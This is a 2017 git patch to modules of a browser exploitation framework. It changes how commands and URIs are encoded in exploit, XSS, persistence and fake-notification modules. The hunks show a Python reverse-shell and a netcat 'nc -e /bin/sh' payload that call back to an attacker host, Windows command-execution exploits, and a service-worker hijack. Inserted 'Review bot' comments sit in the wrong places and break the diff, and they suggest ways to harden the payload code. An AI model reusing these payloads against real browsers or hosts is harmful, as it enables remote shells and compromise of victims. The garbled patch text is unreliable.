From f545b3631bde67d5c35ff52e053c1711c62c4b60 Mon Sep 17 00:00:00 2001
From: Brendan Coles
Date: Fri, 11 Aug 2017 05:44:32 +0000
Subject: [PATCH] Replace gsub quotes with base64 encoding
---
 modules/debug/test_beef_debug/command.js | 2 +-
 .../exploits/local_host/activex_command_execution/command.js | 2 +-
 .../exploits/local_host/mozilla_nsiprocess_interface/command.js | 2 +-
 .../exploits/local_host/mozilla_nsiprocess_interface/module.rb | 2 +-
 modules/exploits/rfi_scanner/module.rb | 2 +-
 modules/exploits/router/netgear_dgn2200_cmd_exec/command.js | 2 +-
 modules/exploits/xss/alienvault_ossim_3.1_xss/command.js | 2 +-
 .../exploits/xss/cisco_collaboration_server_5_xss/command.js | 2 +-
 modules/exploits/xss/serendipity_1.6_xss/command.js | 2 +-
 modules/exploits/xss/sqlitemanager_xss/command.js | 2 +-
 modules/misc/blockui/command.js | 2 +-
 modules/persistence/jsonp_service_worker/command.js | 2 +-
 modules/social_engineering/fake_notification/command.js | 2 +-
 modules/social_engineering/fake_notification_c/command.js | 2 +-
 modules/social_engineering/fake_notification_ff/command.js | 2 +-
 modules/social_engineering/fake_notification_ie/command.js | 2 +-
 16 files changed, 16 insertions(+), 16 deletions(-)
diff --git a/modules/debug/test_beef_debug/command.js b/modules/debug/test_beef_debug/command.js
index 9066a327b..63040720b 100644
--- a/modules/debug/test_beef_debug/command.js
+++ b/modules/debug/test_beef_debug/command.js
@@ -7,7 +7,7 @@ beef.execute(function() {
 try {
- var msg = decodeURIComponent(beef.encode.base64.decode('<%= Base64.encode64(@msg).delete("\n") %>'));
+ var msg = decodeURIComponent(beef.encode.base64.decode('<%= Base64.strict_encode64(@msg) %>'));
 beef.debug(msg);
 beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=called the beef.debug() function. Check the developer console for your debug message.');
 } catch(e) {
diff --git a/modules/exploits/local_host/activex_command_execution/command.js b/modules/exploits/local_host/activex_command_execution/command.js
index 8d2afeca2..b286eb190 100755
--- a/modules/exploits/local_host/activex_command_execution/command.js
+++ b/modules/exploits/local_host/activex_command_execution/command.js
@@ -6,7 +6,7 @@ beef.execute(function() {
- var cmd = '<%= @cmd.gsub(/'/, "\\'") %>';
+ var cmd = beef.encode.base64.decode('<%= Base64.strict_encode64(@cmd) %>');
 var result = "command was not sent";
 try {
diff --git a/modules/exploits/local_host/mozilla_nsiprocess_interface/command.js b/modules/exploits/local_host/mozilla_nsiprocess_interface/command.js
index 999ed1899..c3264978b 100644
--- a/modules/exploits/local_host/mozilla_nsiprocess_interface/command.js
+++ b/modules/exploits/local_host/mozilla_nsiprocess_interface/command.js
@@ -9,7 +9,7 @@ beef.execute(function() {
 var result = "command sent";
 try {
- var command_str = "<%= command_str.gsub!(/"/, '\\"') %>";
+ var command_str = beef.encode.base64.decode('<%= Base64.strict_encode64(@command_str) %>');
 var getWorkingDir= Components.classes["@mozilla.org/file/directory_service;1"].getService(Components.interfaces.nsIProperties).get("Home",Components.interfaces.nsIFile);
 var lFile = Components.classes["@mozilla.org/file/local;1"].createInstance(Components.interfaces.nsILocalFile);
 var lPath = "C:\\WINDOWS\\system32\\cmd.exe"; // maybe "%WINDIR%\\system32\\cmd.exe" would work?
diff --git a/modules/exploits/local_host/mozilla_nsiprocess_interface/module.rb b/modules/exploits/local_host/mozilla_nsiprocess_interface/module.rb
index 6a545f6b3..0d6f5314b 100644
--- a/modules/exploits/local_host/mozilla_nsiprocess_interface/module.rb
+++ b/modules/exploits/local_host/mozilla_nsiprocess_interface/module.rb
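Review bot: The new `var cmd = beef.encode.base64.decode(...)` line has no `decodeURIComponent(...)` around the decode, while the `test_beef_debug` hunk in this same patch keeps that wrapper; if `beef.encode.base64.decode` returns one JS char per decoded byte (the usual atob-style behaviour, which I cannot confirm from here), a command containing non-ASCII bytes would reach the shell mangled. Either URI-encode `@cmd` on the Ruby side and wrap it as `decodeURIComponent(beef.encode.base64.decode('<%= Base64.strict_encode64(@cmd) %>'))`, or state the limit on the line, e.g. `// @cmd is transported as raw base64 bytes; non-ASCII commands are not supported`. The base64 transport is still the right move: the old `@cmd.gsub(/'/, "\\'")` only escaped single quotes, so a backslash, newline or `</script>` in the command could break out of the JS string literal. The `beef.execute` callback that contains this line continues past the end of the hunk.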
@@ -9,7 +9,7 @@ class Mozilla_nsiprocess_interface < BeEF::Core::Command
 def self.options
 return [
- {'name' => 'ports', 'ui_label' => 'Windows Command', 'value' => 'ping localhost'}
+ {'name' => 'command_str', 'ui_label' => 'Windows Command', 'value' => 'ping localhost'}
 ]
 end
diff --git a/modules/exploits/rfi_scanner/module.rb b/modules/exploits/rfi_scanner/module.rb
index f70319d5e..c8cf7a145 100644
--- a/modules/exploits/rfi_scanner/module.rb
+++ b/modules/exploits/rfi_scanner/module.rb
@@ -20,7 +20,7 @@ class Rfi_scanner < BeEF::Core::Command
 if input['name'] == 'payload'
 case input['value']
 when "reverse_python" # msfvenom -p cmd/unix/reverse_python LHOST=X.X.X.X LPORT=XXXX
- cmd = Base64.encode64("import socket,subprocess,os;host='#{lhost}';port=#{lport};s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((host,port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);").gsub(/\r?\n/, '')
+ cmd = Base64.strict_encode64("import socket,subprocess,os;host='#{lhost}';port=#{lport};s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((host,port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);")
 payload = "`python -c \"exec ('#{cmd}'.decode ('base64') )\"`"
 when "reverse_netcat"
 payload = "`nc #{lhost} #{lport} -e /bin/sh`"
diff --git a/modules/exploits/router/netgear_dgn2200_cmd_exec/command.js b/modules/exploits/router/netgear_dgn2200_cmd_exec/command.js
index 316ec4fff..a2cf8f8ed 100755
--- a/modules/exploits/router/netgear_dgn2200_cmd_exec/command.js
+++ b/modules/exploits/router/netgear_dgn2200_cmd_exec/command.js
@@ -7,7 +7,7 @@ beef.execute(function() {
 var rhost = '<%= @rhost %>';
- var cmd = '<%= Base64.encode64(@cmd).delete("\n") %>';
+ var cmd = '<%= Base64.strict_encode64(@cmd) %>';
 var timeout = 15;
 var netgear_dgn2200_iframe_<%= @command_id %> = beef.dom.createInvisibleIframe();
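Review bot: On the new `cmd = Base64.strict_encode64(...)` line `lhost` and `lport` are still interpolated raw into Python source (`host='#{lhost}';port=#{lport}`), and that source is then dropped into a shell backtick substitution two lines further down; a `'` or `;` in `lhost`, or a non-numeric `lport`, escapes the Python string literal rather than failing cleanly. Where the two values are assigned is outside this hunk (presumably module options), so a guard before the `case`, e.g. `raise ArgumentError, 'bad lhost' unless lhost =~ /\A[\w.\-]+\z/` and `raise ArgumentError, 'bad lport' unless lport.to_s =~ /\A\d{1,5}\z/`, would keep the payload builder from emitting broken Python. The `strict_encode64` swap itself is sound, since it never emits the line breaks the old `gsub(/\r?\n/, '')` was removing. The enclosing method begins before and ends after the hunk.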
diff --git a/modules/exploits/xss/alienvault_ossim_3.1_xss/command.js b/modules/exploits/xss/alienvault_ossim_3.1_xss/command.js
index 94bb2d746..f3f1fa34d 100644
--- a/modules/exploits/xss/alienvault_ossim_3.1_xss/command.js
+++ b/modules/exploits/xss/alienvault_ossim_3.1_xss/command.js
@@ -6,7 +6,7 @@ beef.execute(function() {
- var uri = '<%= @uri.gsub(/'/, "\\'") %>';
+ var uri = beef.encode.base64.decode('<%= Base64.strict_encode64(@uri) %>');
 var alienvault_iframe_<%= @command_id %> = beef.dom.createInvisibleIframe();
 alienvault_iframe_<%= @command_id %>.setAttribute('src', uri);
diff --git a/modules/exploits/xss/cisco_collaboration_server_5_xss/command.js b/modules/exploits/xss/cisco_collaboration_server_5_xss/command.js
index 9dc7cc5a2..03f1f5126 100644
--- a/modules/exploits/xss/cisco_collaboration_server_5_xss/command.js
+++ b/modules/exploits/xss/cisco_collaboration_server_5_xss/command.js
@@ -6,7 +6,7 @@ beef.execute(function() {
- var uri = '<%= @uri.gsub(/'/, "\\'") %>';
+ var uri = beef.encode.base64.decode('<%= Base64.strict_encode64(@uri) %>');
 var cisco_collaboration_iframe = beef.dom.createInvisibleIframe();
 cisco_collaboration_iframe.setAttribute('src', uri);
diff --git a/modules/exploits/xss/serendipity_1.6_xss/command.js b/modules/exploits/xss/serendipity_1.6_xss/command.js
index 7b9734c7d..959e9af70 100644
--- a/modules/exploits/xss/serendipity_1.6_xss/command.js
+++ b/modules/exploits/xss/serendipity_1.6_xss/command.js
@@ -6,7 +6,7 @@ beef.execute(function() {
- var uri = '<%= @uri.gsub(/'/, "\\'") %>';
+ var uri = beef.encode.base64.decode('<%= Base64.strict_encode64(@uri) %>');
 var serendipity_iframe = beef.dom.createInvisibleIframe();
 serendipity_iframe.setAttribute('src', uri);
diff --git a/modules/exploits/xss/sqlitemanager_xss/command.js b/modules/exploits/xss/sqlitemanager_xss/command.js
index 7b9734c7d..959e9af70 100644
--- a/modules/exploits/xss/sqlitemanager_xss/command.js
+++ b/modules/exploits/xss/sqlitemanager_xss/command.js
@@ -6,7 +6,7 @@ beef.execute(function() {
- var uri = '<%= @uri.gsub(/'/, "\\'") %>';
+ var uri = beef.encode.base64.decode('<%= Base64.strict_encode64(@uri) %>');
 var serendipity_iframe = beef.dom.createInvisibleIframe();
 serendipity_iframe.setAttribute('src', uri);
diff --git a/modules/misc/blockui/command.js b/modules/misc/blockui/command.js
index 535cd9dbf..1d9219b7e 100644
--- a/modules/misc/blockui/command.js
+++ b/modules/misc/blockui/command.js
@@ -8,7 +8,7 @@ beef.execute(function() {
 var timeout = '<%= @timeout %>' * 1000;
 var blockui = function() {
- $j.blockUI({ message: decodeURIComponent(beef.encode.base64.decode('<%= Base64.encode64(@message).delete("\n") %>')) });
+ $j.blockUI({ message: decodeURIComponent(beef.encode.base64.decode('<%= Base64.strict_encode64(@message) %>')) });
 setTimeout("$j.unblockUI();", <%= @timeout %> * 1000);
 }
diff --git a/modules/persistence/jsonp_service_worker/command.js b/modules/persistence/jsonp_service_worker/command.js
index 5da2b78fc..d6c0f4f7d 100644
--- a/modules/persistence/jsonp_service_worker/command.js
+++ b/modules/persistence/jsonp_service_worker/command.js
@@ -7,7 +7,7 @@ beef.execute(function() {
 var scriptElem = document.createElement("script");
 var hook = encodeURIComponent(beef.net.hook);
- var tempBody = encodeURIComponent('<%= @tempBody.gsub(/'/, "\\'") %>');
+ var tempBody = encodeURIComponent(beef.encode.base64.decode('<%= Base64.strict_encode64(@tempBody) %>');
 scriptElem.innerHTML = 'navigator.serviceWorker.register("<%=@JSONPPath%>onfetch%3Dfunction(e)%7B%0Aif(!(e.request.url.indexOf(%27'+beef.net.httpproto+'%3A%2F%2F'+beef.net.host+'%3A'+beef.net.port+'%27)>=0))%0Ae.respondWith(new%20Response(%27'+tempBody+'%3Cscript%20src%3D%5C%27'+beef.net.httpproto+'%3A%2F%2F'+beef.net.host+'%3A'+beef.net.port+hook+'%5C%27%20type%3D%5C%27text%2Fjavascript%5C%27%3E%3C%2Fscript%3E%27%2C%7Bheaders%3A%20%7B%27Content-Type%27%3A%27text%2Fhtml%27%7D%7D))%0Aelse%0Ae.fetch(e.request)%0A%7D%2F%2F")';
 $j("body").append(scriptElem);
 beef.net.send("<%= @command_url %>", <%=@command_id%>, "result=Script element inserted within the body, domain for the browser permanently compromized if everything went as expected.");
diff --git a/modules/social_engineering/fake_notification/command.js b/modules/social_engineering/fake_notification/command.js
index 48019c90a..1a88b18b1 100644
--- a/modules/social_engineering/fake_notification/command.js
+++ b/modules/social_engineering/fake_notification/command.js
@@ -17,7 +17,7 @@ beef.execute(function() {
 var hid = '#'+id;
 var hpid = '#'+pid;
 $j(hid).append(elp);
- $j(hpid).html(decodeURIComponent(beef.encode.base64.decode('<%= Base64.encode64(@notification_text).delete("\n") %>')));
+ $j(hpid).html(decodeURIComponent(beef.encode.base64.decode('<%= Base64.strict_encode64(@notification_text) %>')));
 $j(hid).append(ell);
 $j(hid).append(elr);
 $j(hid).click(function() {
diff --git a/modules/social_engineering/fake_notification_c/command.js b/modules/social_engineering/fake_notification_c/command.js
index 6cb2010cb..a3995ba48 100644
--- a/modules/social_engineering/fake_notification_c/command.js
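Review bot: The new `var tempBody = ...` line is missing a closing parenthesis: `encodeURIComponent(beef.encode.base64.decode('…')` opens two calls and closes only one, so the generated script is a syntax error and the service worker is never registered. It should read `var tempBody = encodeURIComponent(beef.encode.base64.decode('<%= Base64.strict_encode64(@tempBody) %>'));`. The old line it replaces was balanced, so this is a regression introduced by the patch rather than a pre-existing fault. The `beef.execute` callback around it runs past both ends of the hunk.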
+++ b/modules/social_engineering/fake_notification_c/command.js
@@ -17,7 +17,7 @@ beef.execute(function() {
 var hid = '#'+id;
 var hpid = '#'+pid;
 $j(hid).append(elp);
- $j(hpid).html(decodeURIComponent(beef.encode.base64.decode('<%= Base64.encode64(@notification_text).delete("\n") %>')));
+ $j(hpid).html(decodeURIComponent(beef.encode.base64.decode('<%= Base64.strict_encode64(@notification_text) %>')));
 $j(hid).append(ell);
 $j(hid).append(elr);
 $j(hid).click(function() {
diff --git a/modules/social_engineering/fake_notification_ff/command.js b/modules/social_engineering/fake_notification_ff/command.js
index 24d2ccb47..b0221ecc4 100644
--- a/modules/social_engineering/fake_notification_ff/command.js
+++ b/modules/social_engineering/fake_notification_ff/command.js
@@ -17,7 +17,7 @@ beef.execute(function() {
 var hid = '#'+id;
 var hpid = '#'+pid;
 $j(hid).append(elp);
- $j(hpid).html(decodeURIComponent(beef.encode.base64.decode('<%= Base64.encode64(@notification_text).delete("\n") %>'))+" ");
+ $j(hpid).html(decodeURIComponent(beef.encode.base64.decode('<%= Base64.strict_encode64(@notification_text) %>'))+" ");
 $j(hid).append(ell);
 //$j(hid).append("Problems installing? ");
 $j(hid).append(elr);
diff --git a/modules/social_engineering/fake_notification_ie/command.js b/modules/social_engineering/fake_notification_ie/command.js
index 1d7e143f2..6b9dbf985 100644
--- a/modules/social_engineering/fake_notification_ie/command.js
+++ b/modules/social_engineering/fake_notification_ie/command.js
@@ -17,7 +17,7 @@ beef.execute(function() {
 var hid = '#'+id;
 var hpid = '#'+pid;
 $j(hid).append(elp);
- $j(hpid).html(decodeURIComponent(beef.encode.base64.decode('<%= Base64.encode64(@notification_text).delete("\n") %>')));
+ $j(hpid).html(decodeURIComponent(beef.encode.base64.decode('<%= Base64.strict_encode64(@notification_text) %>')));
 $j(hid).append(ell);
 $j(hid).append(elr);
 $j(hid).click(function() {